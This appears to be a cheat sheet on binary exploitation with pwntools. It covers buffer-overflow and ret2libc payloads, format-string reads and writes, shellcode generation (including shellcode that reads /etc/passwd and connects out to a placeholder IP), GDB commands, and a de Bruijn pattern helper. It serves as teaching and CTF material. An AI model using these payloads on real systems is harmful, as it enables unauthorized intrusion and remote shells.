# Exploit Development Expert

## Binary Exploitation Basics

### Buffer Overflow

```python
from pwn import *

# Find offset
cyclic(200)              # Generate a de Bruijn pattern to send as input
cyclic_find(0x61616166)  # Find the offset of the value that ended up in a register

# Basic exploit
offset = 64
ret_addr = p64(0x401234)
payload = b'A' * offset + ret_addr

# With NX bypass (ret2libc)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system = libc.symbols['system']              # offset relative to libc base until libc.address is set
bin_sh = next(libc.search(b'/bin/sh'))
```
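Offset finding works because a de Bruijn pattern makes every 4-byte window unique, so the value a crash leaves in a register pins down exactly how far into the input the overwritten slot lies. The following is an added example, not code from the page or from pwntools: a stdlib-only reimplementation of `cyclic()` / `cyclic_find()` using the same construction, handy for crash triage on a host where pwntools is not installed. The names `ALPHABET`, `de_bruijn`, `cyclic`, `cyclic_find` and the 4096-byte search bound are this example's own choices.

```python
import struct
from itertools import islice

# Lowercase alphabet, the same one pwntools' cyclic() uses by default.
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n): every n-byte window is unique.

    Standard Lyndon-word construction; the output starts 'aaaabaaacaaad...'
    exactly like pwntools' cyclic(), so offsets agree with cyclic_find().
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """Return the first `length` bytes of the pattern."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(needle, n=4, max_len=4096):
    """Return the offset of `needle` in the pattern, or -1 if it is not part of it.

    An int is read the way a debugger shows a clobbered register: little-endian,
    so 0x61616166 is the window b'faaa'. Only the first n bytes are matched, which
    for an 8-byte register value is the low dword. max_len is this example's
    search bound (constructed); raise it for unusually large buffers.
    """
    if isinstance(needle, int):
        needle = struct.pack("<I" if needle < (1 << 32) else "<Q", needle)
    needle = bytes(needle)[:n]
    return cyclic(max_len, n).find(needle)
```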
### Format String

```python
# Read from stack
payload = b'%x.' * 20   # Dump successive stack words
payload = b'%7$s'       # Read the string pointed to by a specific argument position

# Write to address
payload = fmtstr_payload(offset, {target_addr: value})
```
### Shellcode

```python
# Using pwntools
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())

# Common shellcodes
shellcraft.sh()                  # /bin/sh
shellcraft.cat('/etc/passwd')
shellcraft.connect('IP', PORT)
```
## Pwntools Essentials

```python
from pwn import *

# Setup
context.binary = ELF('./vuln')
context.log_level = 'debug'

# Connection
p = process('./vuln')       # Local
p = remote('ip', port)      # Remote
p = gdb.debug('./vuln')     # With GDB

# I/O
p.sendline(payload)
p.recvuntil(b'>')
data = p.recv(100)

# Interactive
p.interactive()
```
## GDB Commands

```
gdb ./binary
checksec           # Security features (pwndbg/GEF command)
info functions     # List functions
disas main         # Disassemble
b *0x401234        # Breakpoint
r < payload.txt    # Run with input
x/20wx $rsp        # Examine stack
```